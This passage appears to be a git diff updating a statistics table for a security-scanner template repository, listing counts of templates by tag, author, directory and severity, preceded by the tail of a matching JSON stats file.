(digisec360)","count":1},{"name":"noobexploiter","count":1},{"name":"blckraven","count":1},{"name":"adrianmf","count":1},{"name":"tirtha","count":1},{"name":"5up3r541y4n","count":1},{"name":"jaimin gondaliya","count":1},{"name":"joanbonon","count":1},{"name":"flag007","count":1},{"name":"kareemse1im","count":1},{"name":"0xrod","count":1},{"name":"null_hypothesis","count":1},{"name":"mlec","count":1},{"name":"savik","count":1},{"name":"b0rn2r00t","count":1},{"name":"adilsoybali","count":1},{"name":"0xtavian","count":1},{"name":"daviey","count":1},{"name":"rotembar","count":1}],"directory":[{"name":"http","count":7723},{"name":"file","count":402},{"name":"workflows","count":192},{"name":"network","count":137},{"name":"cloud","count":134},{"name":"code","count":81},{"name":"javascript","count":61},{"name":"ssl","count":29},{"name":"dast","count":25},{"name":"dns","count":22},{"name":"headless","count":13},{"name":"TEMPLATES-STATS.json","count":1},{"name":"vulnerabilities","count":1},{"name":"cves.json","count":1},{"name":"passive","count":1},{"name":"contributors.json","count":1}],"severity":[{"name":"info","count":3802},{"name":"high","count":1843},{"name":"medium","count":1588},{"name":"critical","count":1083},{"name":"low","count":272},{"name":"unknown","count":41}],"types":[{"name":"file","count":402},{"name":"dns","count":25}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 4e4ba3d07e..3a9ec1634c 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,5625 +1,5662 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------------------------------------------|-------|---------------------------------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 2571 | dhiyaneshdk | 1351 | http | 7663 | info | 3789 | file | 402 | -| panel | 1167 | daffainfo | 864 | file | 402 | high | 1816 | dns | 25 | -| wordpress | 1002 | dwisiswant0 | 803 | workflows | 191 | medium | 1578 | | | -| exposure | 968 | pussycat0x | 439 | network | 135 | critical | 1071 | | | -| xss | 917 | ritikchaddha | 380 | cloud | 134 | low | 271 | | | -| wp-plugin | 872 | pikpikcu | 353 | code | 81 | unknown | 40 | | | -| osint | 804 | princechaddha | 303 | javascript | 61 | | | | | -| tech | 698 | pdteam | 297 | ssl | 29 | | | | | -| lfi | 678 | ricardomaia | 239 | dast | 25 | | | | | -| misconfig | 673 | geeknik | 231 | dns | 22 | | | | | -| rce | 616 | theamanrawat | 213 | headless | 12 | | | | | +| cve | 2604 | dhiyaneshdk | 1360 | http | 7723 | info | 3802 | file | 402 | +| panel | 1173 | daffainfo | 864 | file | 402 | high | 1843 | dns | 25 | +| wordpress | 1008 | dwisiswant0 | 803 | workflows | 192 | medium | 1588 | | | +| exposure | 971 | pussycat0x | 447 | network | 137 | critical | 1083 | | | +| xss | 919 | ritikchaddha | 393 | cloud | 134 | low | 272 | | | +| wp-plugin | 878 | pikpikcu | 353 | code | 81 | unknown | 41 | | | +| osint | 805 | princechaddha | 303 | javascript | 61 | | | | | +| tech | 703 | pdteam | 297 | ssl | 29 | | | | | +| lfi | 685 | ricardomaia | 241 | dast | 25 | | | | | +| misconfig | 678 | geeknik | 231 | dns | 22 | | | | | +| rce | 624 | theamanrawat | 213 | headless | 13 | | | | | | edb | 597 | r3y3r53 | 199 | cves.json | 1 | | | | | -| packetstorm | 546 | 0x_akoko | 179 | contributors.json | 1 | | | | | -| wpscan | 506 | gy741 | 162 | TEMPLATES-STATS.json | 1 | | | | | -| cve2021 | 493 | righettod | 156 | passive | 1 | | | | | -| cve2022 | 472 | rxerium | 145 | | | | | | | -| wp | 435 | sleepingbag945 | 132 | | | | | | | -| cve2023 | 393 | arafatansari | 118 | | | | | | | -| unauth | 370 | tess | 109 | | | | | | | -| sqli | 370 | pdresearch | 85 | | | | | | | -| file | 345 | iamnoooob | 71 | | | | | | | -| authenticated | 344 | idealphase | 66 | | | | | | | -| detect | 313 | madrobot | 65 | | | | | | | -| intrusive | 312 | zzeitlin | 64 | | | | | | | -| login | 299 | rootxharsh | 63 | | | | | | | -| kev | 277 | akincibor | 59 | | | | | | | +| packetstorm | 547 | 0x_akoko | 179 | passive | 1 | | | | | +| wpscan | 508 | righettod | 165 | TEMPLATES-STATS.json | 1 | | | | | +| cve2021 | 493 | gy741 | 162 | contributors.json | 1 | | | | | +| cve2022 | 475 | rxerium | 145 | vulnerabilities | 1 | | | | | +| wp | 437 | sleepingbag945 | 132 | | | | | | | +| cve2023 | 400 | arafatansari | 118 | | | | | | | +| sqli | 378 | tess | 109 | | | | | | | +| unauth | 372 | pdresearch | 92 | | | | | | | +| authenticated | 345 | iamnoooob | 78 | | | | | | | +| file | 345 | rootxharsh | 70 | | | | | | | +| detect | 325 | idealphase | 66 | | | | | | | +| intrusive | 315 | madrobot | 65 | | | | | | | +| login | 306 | zzeitlin | 64 | | | | | | | +| kev | 278 | akincibor | 59 | | | | | | | | cve2020 | 256 | for3stco1d | 55 | | | | | | | | token-spray | 243 | philippedelteil | 52 | | | | | | | -| config | 224 | johnk3r | 45 | | | | | | | -| oast | 223 | gaurang | 42 | | | | | | | -| default-login | 222 | edoardottt | 40 | | | | | | | -| top-200 | 222 | c-sh0 | 35 | | | | | | | -| devops | 212 | j4vaovo | 34 | | | | | | | -| osint-social | 210 | securityforeveryone | 32 | | | | | | | -| malware | 209 | luisfelipe146 | 31 | | | | | | | -| apache | 198 | adam crosser | 31 | | | | | | | -| network | 197 | ice3man | 29 | | | | | | | +| config | 225 | johnk3r | 46 | | | | | | | +| default-login | 225 | securityforeveryone | 43 | | | | | | | +| top-200 | 224 | gaurang | 42 | | | | | | | +| oast | 223 | edoardottt | 40 | | | | | | | +| devops | 212 | c-sh0 | 35 | | | | | | | +| osint-social | 210 | j4vaovo | 34 | | | | | | | +| malware | 209 | adam crosser | 31 | | | | | | | +| apache | 201 | luisfelipe146 | 31 | | | | | | | +| network | 199 | ice3man | 29 | | | | | | | | token | 194 | mastercho | 29 | | | | | | | -| | 191 | pwnhxl | 28 | | | | | | | -| cve2018 | 170 | hardik-solanki | 24 | | | | | | | -| cloud | 169 | organiccrap | 24 | | | | | | | -| iot | 167 | techbrunchfr | 23 | | | | | | | +| | 192 | pwnhxl | 28 | | | | | | | +| cve2018 | 170 | organiccrap | 24 | | | | | | | +| cloud | 169 | hardik-solanki | 24 | | | | | | | +| iot | 168 | userdehghani | 23 | | | | | | | | cve2019 | 163 | ctflearner | 23 | | | | | | | -| keys | 156 | userdehghani | 23 | | | | | | | -| install | 151 | harsh | 23 | | | | | | | -| joomla | 148 | ffffffff0x | 22 | | | | | | | -| redirect | 138 | parthmalhotra | 20 | | | | | | | -| tcp | 137 | kazgangap | 20 | | | | | | | -| aws | 135 | sullo | 18 | | | | | | | -| cve2024 | 134 | cckuailong | 18 | | | | | | | -| auth-bypass | 133 | lu4nx | 17 | | | | | | | -| ssrf | 120 | bhutch | 17 | | | | | | | -| amazon | 118 | shaikhyaser | 16 | | | | | | | +| cve2024 | 157 | techbrunchfr | 23 | | | | | | | +| keys | 156 | harsh | 23 | | | | | | | +| install | 153 | ffffffff0x | 22 | | | | | | | +| joomla | 148 | parthmalhotra | 21 | | | | | | | +| redirect | 139 | kazgangap | 20 | | | | | | | +| tcp | 138 | sullo | 18 | | | | | | | +| aws | 135 | cckuailong | 18 | | | | | | | +| auth-bypass | 134 | bhutch | 17 | | | | | | | +| ssrf | 122 | lu4nx | 17 | | | | | | | +| amazon | 118 | random-robbie | 16 | | | | | | | | phishing | 117 | 0xpugazh | 16 | | | | | | | -| cms | 115 | random-robbie | 16 | | | | | | | -| files | 113 | pr3r00t | 15 | | | | | | | -| cve2010 | 112 | unapibageek | 15 | | | | | | | +| cms | 115 | shaikhyaser | 16 | | | | | | | +| files | 114 | unapibageek | 15 | | | | | | | +| cve2010 | 112 | pr3r00t | 15 | | | | | | | | cve2017 | 110 | sheikhrishad | 15 | | | | | | | | router | 108 | r3dg33k | 14 | | | | | | | -| top-100 | 100 | milo2012 | 14 | | | | | | | +| top-100 | 101 | dogasantos | 14 | | | | | | | | aws-cloud-config | 91 | tenbird | 14 | | | | | | | -| disclosure | 89 | dogasantos | 14 | | | | | | | -| linux | 85 | kazet | 13 | | | | | | | -| code | 81 | nullfuzz | 13 | | | | | | | -| local | 80 | melbadry9 | 13 | | | | | | | -| privesc | 79 | elsfa7110 | 13 | | | | | | | +| disclosure | 90 | milo2012 | 14 | | | | | | | +| linux | 85 | nullfuzz | 13 | | | | | | | +| code | 81 | kazet | 13 | | | | | | | +| local | 80 | elsfa7110 | 13 | | | | | | | | seclists | 79 | sharath | 13 | | | | | | | -| tokens | 78 | theabhinavgaur | 13 | | | | | | | -| takeover | 78 | 0ri2n | 13 | | | | | | | -| fileupload | 76 | meme-lord | 12 | | | | | | | -| oracle | 74 | suman_kar | 12 | | | | | | | -| kubernetes | 71 | cyllective | 11 | | | | | | | -| oss | 69 | wdahlenb | 11 | | | | | | | -| js | 68 | co5mos | 10 | | | | | | | -| cisco | 67 | 0x240x23elu | 10 | | | | | | | +| privesc | 79 | melbadry9 | 13 | | | | | | | +| tokens | 78 | 0ri2n | 13 | | | | | | | +| takeover | 78 | theabhinavgaur | 13 | | | | | | | +| fileupload | 76 | suman_kar | 12 | | | | | | | +| oracle | 74 | meme-lord | 12 | | | | | | | +| kubernetes | 71 | wdahlenb | 11 | | | | | | | +| oss | 69 | cyllective | 11 | | | | | | | +| js | 68 | co5mos | 11 | | | | | | | +| cisco | 67 | logicalhunter | 10 | | | | | | | | enum | 65 | alph4byt3 | 10 | | | | | | | -| adobe | 64 | hackergautam | 10 | | | | | | | -| k8s | 62 | nadino | 10 | | | | | | | -| ir | 61 | logicalhunter | 10 | | | | | | | -| huntr | 60 | random_robbie | 10 | | | | | | | -| cve2015 | 59 | adamcrosser | 9 | | | | | | | -| atlassian | 59 | initstring | 9 | | | | | | | +| adobe | 64 | nadino | 10 | | | | | | | +| ir | 62 | random_robbie | 10 | | | | | | | +| k8s | 62 | 0x240x23elu | 10 | | | | | | | +| huntr | 60 | hackergautam | 10 | | | | | | | +| atlassian | 59 | momika233 | 9 | | | | | | | +| cve2015 | 59 | olearycrew | 9 | | | | | | | | cve2016 | 57 | fabaff | 9 | | | | | | | -| detection | 57 | olearycrew | 9 | | | | | | | +| detection | 57 | icarot | 9 | | | | | | | +| vmware | 56 | initstring | 9 | | | | | | | +| c2 | 56 | oppsec | 9 | | | | | | | | google | 56 | emadshanab | 9 | | | | | | | -| vmware | 56 | momika233 | 9 | | | | | | | -| c2 | 55 | oppsec | 9 | | | | | | | -| logs | 48 | veshraj | 8 | | | | | | | -| tenable | 48 | that_juan_ | 8 | | | | | | | -| log4j | 47 | noraj | 8 | | | | | | | -| hackerone | 46 | irshad ahamed | 8 | | | | | | | -| vulhub | 46 | zh | 8 | | | | | | | -| osint-gaming | 45 | aashiq | 8 | | | | | | | +| tenable | 48 | adamcrosser | 9 | | | | | | | +| logs | 48 | irshad ahamed | 8 | | | | | | | +| log4j | 47 | _0xf4n9x_ | 8 | | | | | | | +| vulhub | 46 | that_juan_ | 8 | | | | | | | +| hackerone | 46 | noraj | 8 | | | | | | | +| php | 45 | veshraj | 8 | | | | | | | +| aem | 45 | aashiq | 8 | | | | | | | | generic | 45 | iamthefrogy | 8 | | | | | | | -| aem | 45 | _0xf4n9x_ | 8 | | | | | | | -| php | 45 | harshbothra_ | 7 | | | | | | | -| jndi | 44 | amit-jd | 7 | | | | | | | -| cve2014 | 44 | divya_mudgal | 7 | | | | | | | -| debug | 44 | nodauf | 7 | | | | | | | -| deserialization | 44 | leovalcante | 7 | | | | | | | -| cnvd | 43 | dr_set | 7 | | | | | | | -| traversal | 43 | its0x08 | 7 | | | | | | | -| microsoft | 42 | caspergn | 7 | | | | | | | -| plugin | 42 | randomstr1ng | 7 | | | | | | | -| osint-porn | 42 | tarunkoyalwar | 7 | | | | | | | -| osint-hobby | 42 | huta0 | 7 | | | | | | | -| oa | 42 | kophjager007 | 7 | | | | | | | -| springboot | 41 | techryptic (@tech) | 7 | | | | | | | -| misc | 40 | nvn1729 | 6 | | | | | | | -| injection | 39 | forgedhallpass | 6 | | | | | | | -| miscellaneous | 38 | pathtaga | 6 | | | | | | | -| listing | 38 | gitlab red team | 6 | | | | | | | -| jira | 37 | praetorian-thendrickson | 6 | | | | | | | -| ibm | 36 | imnightmaree | 6 | | | | | | | -| cti | 36 | devang-solanki | 6 | | | | | | | -| osint-misc | 35 | xelkomy | 6 | | | | | | | -| k8s-cluster-security | 34 | clem9669 | 6 | | | | | | | -| sap | 34 | hahwul | 6 | | | | | | | -| fuzz | 34 | byt3bl33d3r | 6 | | | | | | | -| ssl | 33 | __fazal | 6 | | | | | | | -| devsecops | 32 | icarot | 6 | | | | | | | -| dlink | 32 | evan rubinstein | 6 | | | | | | | -| tls | 32 | puzzlepeaches | 6 | | | | | | | -| osint-tech | 31 | pentest_swissky | 6 | | | | | | | -| wp-theme | 30 | lucky0x0d | 6 | | | | | | | -| ec2 | 30 | ja1sh | 6 | | | | | | | -| osint-coding | 30 | justaacat | 6 | | | | | | | -| fortinet | 28 | megamansec | 6 | | | | | | | -| gitlab | 28 | me_dheeraj | 6 | | | | | | | +| osint-gaming | 45 | zh | 8 | | | | | | | +| deserialization | 44 | amit-jd | 7 | | | | | | | +| jndi | 44 | tarunkoyalwar | 7 | | | | | | | +| debug | 44 | harshbothra_ | 7 | | | | | | | +| cve2014 | 44 | kophjager007 | 7 | | | | | | | +| cnvd | 44 | its0x08 | 7 | | | | | | | +| traversal | 43 | dr_set | 7 | | | | | | | +| osint-hobby | 42 | caspergn | 7 | | | | | | | +| oa | 42 | randomstr1ng | 7 | | | | | | | +| plugin | 42 | nodauf | 7 | | | | | | | +| microsoft | 42 | techryptic (@tech) | 7 | | | | | | | +| osint-porn | 42 | leovalcante | 7 | | | | | | | +| springboot | 41 | divya_mudgal | 7 | | | | | | | +| injection | 40 | huta0 | 7 | | | | | | | +| misc | 40 | megamansec | 6 | | | | | | | +| miscellaneous | 38 | nvn1729 | 6 | | | | | | | +| listing | 38 | devang-solanki | 6 | | | | | | | +| jira | 37 | justaacat | 6 | | | | | | | +| cti | 37 | ja1sh | 6 | | | | | | | +| ibm | 36 | forgedhallpass | 6 | | | | | | | +| osint-misc | 35 | byt3bl33d3r | 6 | | | | | | | +| fuzz | 34 | robotshell | 6 | | | | | | | +| k8s-cluster-security | 34 | xelkomy | 6 | | | | | | | +| sap | 34 | gitlab red team | 6 | | | | | | | +| ssl | 33 | pathtaga | 6 | | | | | | | +| devsecops | 32 | me_dheeraj | 6 | | | | | | | | | | (https://twitter.com/dheerajmadhukar) | | | | | | | | -| api | 28 | mr-xn | 5 | | | | | | | -| citrix | 27 | ice3man543 | 5 | | | | | | | -| file-upload | 27 | pulsesecurity.co.nz | 5 | | | | | | | -| dns | 27 | joanbono | 5 | | | | | | | -| lfr | 27 | robotshell | 5 | | | | | | | -| bestwebsoft | 27 | r12w4n | 5 | | | | | | | -| proxy | 27 | ganofins | 5 | | | | | | | -| firewall | 26 | s0obi | 5 | | | | | | | -| zohocorp | 26 | gtrrnr | 5 | | | | | | | -| admin | 26 | andreluna | 5 | | | | | | | -| manageengine | 26 | defr0ggy | 5 | | | | | | | -| ssh | 26 | vicrack | 5 | | | | | | | -| cve2012 | 26 | powerexploit | 5 | | | | | | | -| weaver | 25 | arm!tage | 5 | | | | | | | +| dlink | 32 | evan rubinstein | 6 | | | | | | | +| tls | 32 | lucky0x0d | 6 | | | | | | | +| osint-tech | 31 | pentest_swissky | 6 | | | | | | | +| wp-theme | 30 | hahwul | 6 | | | | | | | +| file-upload | 30 | __fazal | 6 | | | | | | | +| ec2 | 30 | puzzlepeaches | 6 | | | | | | | +| osint-coding | 30 | praetorian-thendrickson | 6 | | | | | | | +| fortinet | 28 | clem9669 | 6 | | | | | | | +| gitlab | 28 | imnightmaree | 6 | | | | | | | +| api | 28 | vicrack | 5 | | | | | | | +| lfr | 27 | your3cho | 5 | | | | | | | +| proxy | 27 | r12w4n | 5 | | | | | | | +| citrix | 27 | gtrrnr | 5 | | | | | | | +| dns | 27 | ganofins | 5 | | | | | | | +| bestwebsoft | 27 | yanyun | 5 | | | | | | | +| firewall | 26 | panch0r3d | 5 | | | | | | | +| zohocorp | 26 | king-alexander | 5 | | | | | | | +| manageengine | 26 | pulsesecurity.co.nz | 5 | | | | | | | +| admin | 26 | s0obi | 5 | | | | | | | +| cve2012 | 26 | defr0ggy | 5 | | | | | | | +| ssh | 26 | powerexploit | 5 | | | | | | | +| dast | 25 | ice3man543 | 5 | | | | | | | | xxe | 25 | r3naissance | 5 | | | | | | | -| dast | 25 | yanyun | 5 | | | | | | | -| zoho | 25 | kh4sh3i | 5 | | | | | | | -| printer | 24 | podalirius | 5 | | | | | | | -| osint-shopping | 24 | panch0r3d | 5 | | | | | | | -| osint-business | 24 | your3cho | 5 | | | | | | | -| osint-images | 24 | isacaya | 5 | | | | | | | +| zoho | 25 | prajiteshsingh | 5 | | | | | | | +| weaver | 25 | podalirius | 5 | | | | | | | +| osint-business | 24 | isacaya | 5 | | | | | | | +| osint-images | 24 | kh4sh3i | 5 | | | | | | | +| osint-shopping | 24 | arm!tage | 5 | | | | | | | +| printer | 24 | andreluna | 5 | | | | | | | | osint-finance | 24 | shine | 5 | | | | | | | -| yonyou | 23 | prajiteshsingh | 5 | | | | | | | -| audit | 23 | king-alexander | 5 | | | | | | | -| stored-xss | 23 | cookiehanhoan | 4 | | | | | | | -| tomcat | 23 | jpg0mez | 4 | | | | | | | -| prestashop | 22 | 0xr2r | 4 | | | | | | | -| github | 22 | dadevel | 4 | | | | | | | -| cicd | 22 | nybble04 | 4 | | | | | | | -| s3 | 22 | ggranjus | 4 | | | | | | | -| ecology | 21 | heeress | 4 | | | | | | | +| audit | 23 | mr-xn | 5 | | | | | | | +| tomcat | 23 | amirhossein raeisi | 5 | | | | | | | +| info-leak | 23 | incogbyte | 4 | | | | | | | +| yonyou | 23 | m4lwhere | 4 | | | | | | | +| stored-xss | 23 | 3th1c_yuk1 | 4 | | | | | | | +| github | 22 | h1ei1 | 4 | | | | | | | +| cicd | 22 | tanq16 | 4 | | | | | | | +| prestashop | 22 | heeress | 4 | | | | | | | +| s3 | 22 | wisnupramoedya | 4 | | | | | | | +| msf | 21 | e_schultze_ | 4 | | | | | | | +| ecology | 21 | omranisecurity | 4 | | | | | | | | weblogic | 21 | k0pak4 | 4 | | | | | | | -| msf | 21 | 3th1c_yuk1 | 4 | | | | | | | -| ftp | 20 | dolev farhi | 4 | | | | | | | -| jenkins | 20 | h1ei1 | 4 | | | | | | | -| info-leak | 20 | xxcdd | 4 | | | | | | | -| camera | 20 | flx | 4 | | | | | | | -| wavlink | 20 | wisnupramoedya | 4 | | | | | | | -| grafana | 19 | iamnooob | 4 | | | | | | | -| vpn | 19 | tanq16 | 4 | | | | | | | -| apt | 19 | scent2d | 4 | | | | | | | -| hp | 19 | m4lwhere | 4 | | | | | | | -| struts | 19 | incogbyte | 4 | | | | | | | -| confluence | 19 | e_schultze_ | 4 | | | | | | | -| rukovoditel | 19 | shankar acharya | 4 | | | | | | | -| backdoor | 18 | lum8rjack | 4 | | | | | | | -| ruijie | 18 | coldfish | 3 | | | | | | | -| cve2011 | 18 | davidmckennirey | 3 | | | | | | | -| coldfusion | 18 | lark-lab | 3 | | | | | | | -| osint-music | 18 | bernardofsr | 3 | | | | | | | -| android | 18 | atomiczsec | 3 | | | | | | | -| node.js | 18 | dr0pd34d | 3 | | | | | | | -| magento | 17 | binaryfigments | 3 | | | | | | | -| honeypot | 17 | cheesymoon | 3 | | | | | | | -| azure | 17 | canberbamber | 3 | | | | | | | -| zyxel | 17 | _generic_human_ | 3 | | | | | | | -| backup | 17 | charles d | 3 | | | | | | | -| headless | 17 | johnjhacking | 3 | | | | | | | -| mail | 17 | salts | 3 | | | | | | | -| microweber | 17 | impramodsargar | 3 | | | | | | | -| nginx | 17 | whoever | 3 | | | | | | | -| bypass | 16 | skeltavik | 3 | | | | | | | -| ssti | 16 | imjust0 | 3 | | | | | | | -| rconfig | 16 | me9187 | 3 | | | | | | | -| dashboard | 16 | j3ssie | 3 | | | | | | | -| alibaba | 16 | evergreencartoons | 3 | | | | | | | -| osint-blog | 16 | randomrobbie | 3 | | | | | | | -| jarm | 16 | swissky | 3 | | | | | | | -| status | 16 | parth | 3 | | | | | | | -| cve2009 | 16 | sushantkamble | 3 | | | | | | | -| service | 16 | thomas_from_offensity | 3 | | | | | | | +| jenkins | 20 | 0xr2r | 4 | | | | | | | +| wavlink | 20 | joanbono | 4 | | | | | | | +| camera | 20 | farish | 4 | | | | | | | +| ftp | 20 | cookiehanhoan | 4 | | | | | | | +| confluence | 19 | dolev farhi | 4 | | | | | | | +| vpn | 19 | jpg0mez | 4 | | | | | | | +| apt | 19 | dadevel | 4 | | | | | | | +| rukovoditel | 19 | ggranjus | 4 | | | | | | | +| struts | 19 | lum8rjack | 4 | | | | | | | +| grafana | 19 | flx | 4 | | | | | | | +| hp | 19 | scent2d | 4 | | | | | | | +| node.js | 18 | nybble04 | 4 | | | | | | | +| backdoor | 18 | xxcdd | 4 | | | | | | | +| osint-music | 18 | shankar acharya | 4 | | | | | | | +| ruijie | 18 | iamnooob | 4 | | | | | | | +| android | 18 | alifathi-h1 | 3 | | | | | | | +| coldfusion | 18 | arliya | 3 | | | | | | | +| cve2011 | 18 | j3ssie | 3 | | | | | | | +| microweber | 17 | atomiczsec | 3 | | | | | | | +| azure | 17 | ekrause | 3 | | | | | | | +| bypass | 17 | 0w4ys | 3 | | | | | | | +| honeypot | 17 | z3bd | 3 | | | | | | | +| mail | 17 | taielab | 3 | | | | | | | +| zyxel | 17 | vagnerd | 3 | | | | | | | +| backup | 17 | f1tz | 3 | | | | | | | +| nginx | 17 | me9187 | 3 | | | | | | | +| ssti | 17 | salts | 3 | | | | | | | +| headless | 17 | matt galligan | 3 | | | | | | | +| magento | 17 | cheesymoon | 3 | | | | | | | +| xwiki | 16 | randomrobbie | 3 | | | | | | | +| alibaba | 16 | dudez | 3 | | | | | | | +| cve2009 | 16 | vsh00t | 3 | | | | | | | +| service | 16 | impramodsargar | 3 | | | | | | | +| osint-blog | 16 | thomas_from_offensity | 3 | | | | | | | +| jarm | 16 | binaryfigments | 3 | | | | | | | +| netgear | 16 | bernardofsr | 3 | | | | | | | +| rconfig | 16 | splint3r7 | 3 | | | | | | | +| status | 16 | lucasljm2001 | 3 | | | | | | | +| dashboard | 16 | arcc | 3 | | | | | | | +| setup | 16 | dr0pd34d | 3 | | | | | | | +| docker | 15 | badboycxcc | 3 | | | | | | | +| cnvd2021 | 15 | andydoering | 3 | | | | | | | +| moosocial | 15 | yuzhe-zhang-0 | 3 | | | | | | | +| cve2008 | 15 | ambassify | 3 | | | | | | | +| tongda | 15 | aringo | 3 | | | | | | | +| ivanti | 15 | evergreencartoons | 3 | | | | | | | +| ruby | 15 | _generic_human_ | 3 | | | | | | | +| seeyon | 15 | unstabl3 | 3 | | | | | | | +| java | 15 | lark-lab | 3 | | | | | | | +| nagios | 15 | whoever | 3 | | | | | | | | woocommerce | 15 | fxploit | 3 | | | | | | | -| ruby | 15 | lucasljm2001 | 3 | | | | | | | -| seeyon | 15 | arcc | 3 | | | | | | | -| moosocial | 15 | ekrause | 3 | | | | | | | -| cve2008 | 15 | jarijaas | 3 | | | | | | | -| redhat | 15 | ambassify | 3 | | | | | | | -| docker | 15 | z3bd | 3 | | | | | | | -| installer | 15 | 0xkayala | 3 | | | | | | | -| ivanti | 15 | xianke | 3 | | | | | | | -| java | 15 | emenalf | 3 | | | | | | | -| xwiki | 15 | badboycxcc | 3 | | | | | | | -| cve2013 | 15 | mavericknerd | 3 | | | | | | | -| tongda | 15 | shifacyclewala | 3 | | | | | | | -| netgear | 15 | aringo | 3 | | | | | | | -| nagios | 15 | farish | 3 | | | | | | | -| cnvd2021 | 15 | matt galligan | 3 | | | | | | | -| setup | 15 | vsh00t | 3 | | | | | | | -| login-check | 14 | alifathi-h1 | 3 | | | | | | | -| osint-health | 14 | yuzhe-zhang-0 | 3 | | | | | | | -| domainmod | 14 | dudez | 3 | | | | | | | -| node | 14 | taielab | 3 | | | | | | | -| git | 14 | f1tz | 3 | | | | | | | -| osint-art | 14 | e1a | 3 | | | | | | | -| rds | 14 | true13 | 3 | | | | | | | -| nodejs | 14 | splint3r7 | 3 | | | | | | | -| icewarp | 14 | andydoering | 3 | | | | | | | -| creds-stuffing | 14 | yash anand @yashanand155 | 3 | | | | | | | -| dell | 14 | c4sper0 | 3 | | | | | | | -| jboss | 14 | unstabl3 | 3 | | | | | | | +| cve2013 | 15 | 0xkayala | 3 | | | | | | | +| redhat | 15 | mavericknerd | 3 | | | | | | | +| installer | 15 | sushantkamble | 3 | | | | | | | +| nodejs | 14 | emenalf | 3 | | | | | | | +| jboss | 14 | imjust0 | 3 | | | | | | | +| osint-health | 14 | e1a | 3 | | | | | | | +| smtp | 14 | jarijaas | 3 | | | | | | | +| creds-stuffing | 14 | skeltavik | 3 | | | | | | | +| git | 14 | davidmckennirey | 3 | | | | | | | | npm | 14 | huowuzhao | 3 | | | | | | | -| smtp | 14 | vagnerd | 3 | | | | | | | -| redis | 14 | 0w4ys | 3 | | | | | | | -| abstractapi | 13 | fyoorer | 3 | | | | | | | -| hashicorp | 13 | ph33r | 3 | | | | | | | -| airflow | 13 | omranisecurity | 3 | | | | | | | -| sonicwall | 13 | sascha brendel | 2 | | | | | | | -| cuppa | 13 | davidegirardi | 2 | | | | | | | -| fortigate | 13 | charles d. | 2 | | | | | | | -| auth | 13 | n-thumann | 2 | | | | | | | -| laravel | 13 | 0xnirvana | 2 | | | | | | | -| osint-political | 13 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| windows | 13 | z0ne | 2 | | | | | | | -| graphql | 13 | hetroublemakr | 2 | | | | | | | -| cuppacms | 13 | danielmofer | 2 | | | | | | | -| rails | 13 | usdag | 2 | | | | | | | -| kafka | 13 | egemenkochisarli | 2 | | | | | | | -| postgresql | 13 | brenocss | 2 | | | | | | | -| mysql | 13 | 0xcrypto | 2 | | | | | | | -| osint-dating | 13 | bmcel | 2 | | | | | | | -| fuzzing | 13 | thevillagehacker | 2 | | | | | | | -| jetbrains | 12 | x1m_martijn | 2 | | | | | | | -| spring | 12 | herry | 2 | | | | | | | -| phpgurukul | 12 | d4vy | 2 | | | | | | | -| cache | 12 | mrharshvardhan | 2 | | | | | | | -| vbulletin | 12 | socketz | 2 | | | | | | | -| netsweeper | 12 | liwermor | 2 | | | | | | | -| ofbiz | 12 | wa1tf0rme | 2 | | | | | | | -| webserver | 12 | joeldeleep | 2 | | | | | | | -| newrelic | 12 | 0xelkomy | 2 | | | | | | | -| zimbra | 12 | msegoviag | 2 | | | | | | | -| doppler | 12 | brucelsone | 2 | | | | | | | -| drupal | 12 | cocxanh | 2 | | | | | | | -| smb | 12 | foulenzer | 2 | | | | | | | -| deployments | 12 | topscoder | 2 | | | | | | | -| django | 11 | danmcinerney | 2 | | | | | | | -| xstream | 11 | rafaelwdornelas | 2 | | | | | | | -| fastjson | 11 | ajaysenr | 2 | | | | | | | -| iis | 11 | florianmaak | 2 | | | | | | | -| prometheus | 11 | luci | 2 | | | | | | | -| jolokia | 11 | notnotnotveg | 2 | | | | | | | -| osint-video | 11 | sy3omda | 2 | | | | | | | -| iam | 11 | c3l3si4n | 2 | | | | | | | -| glpi | 11 | thabisocn | 2 | | | | | | | -| dedecms | 11 | h0j3n | 2 | | | | | | | -| hikvision | 11 | t3l3machus | 2 | | | | | | | -| solarview | 10 | uomogrande | 2 | | | | | | | -| digitalocean | 10 | sinkettu | 2 | | | | | | | -| elasticsearch | 10 | amsda | 2 | | | | | | | -| zabbix | 10 | nkxxkn | 2 | | | | | | | -| blind | 10 | manas_harsh | 2 | | | | | | | -| symfony | 10 | geekby | 2 | | | | | | | -| instrusive | 10 | sbani | 2 | | | | | | | -| phpmyadmin | 10 | cckuakilong | 2 | | | | | | | -| xstream_project | 10 | github.com/its0x08 | 2 | | | | | | | -| solr | 10 | supr4s | 2 | | | | | | | -| samsung | 10 | codexlynx | 2 | | | | | | | -| thinkphp | 10 | serrapa | 2 | | | | | | | -| dahua | 10 | pbuff07 | 2 | | | | | | | -| sitecore | 10 | supras | 2 | | | | | | | -| dropbox | 10 | joshua rogers | 2 | | | | | | | -| progress | 10 | afaq | 2 | | | | | | | -| crlf | 10 | arliya | 2 | | | | | | | -| db | 10 | amirhossein raeisi | 2 | | | | | | | -| druid | 9 | joshlarsen | 2 | | | | | | | -| moodle | 9 | paperpen | 2 | | | | | | | -| secret | 9 | raesene | 2 | | | | | | | -| firebase | 9 | dogancanbakir | 2 | | | | | | | -| wso2 | 9 | 6mile | 2 | | | | | | | -| vcenter | 9 | maximus decimus | 2 | | | | | | | -| exchange | 9 | ep1csage | 2 | | | | | | | -| facebook | 9 | shankaracharya | 2 | | | | | | | -| gateway | 9 | 666asd | 2 | | | | | | | -| sangfor | 9 | shelled | 2 | | | | | | | -| elastic | 9 | ree4pwn | 2 | | | | | | | -| scada | 9 | streetofhackerr007 | 2 | | | | | | | -| lucee | 9 | martincodes-de | 2 | | | | | | | -| joomla\! | 9 | 0xrudra | 2 | | | | | | | -| gitea | 9 | korteke | 2 | | | | | | | -| sophos | 9 | 0xsapra | 2 | | | | | | | -| artica | 9 | 8arthur | 2 | | | | | | | -| opencats | 9 | christianpoeschl | 2 | | | | | | | -| pfsense | 9 | kiblyn11 | 2 | | | | | | | -| python | 9 | 0xsmiley | 2 | | | | | | | -| versa | 9 | thardt-praetorian | 2 | | | | | | | -| f5 | 9 | udit_thakkur | 2 | | | | | | | -| 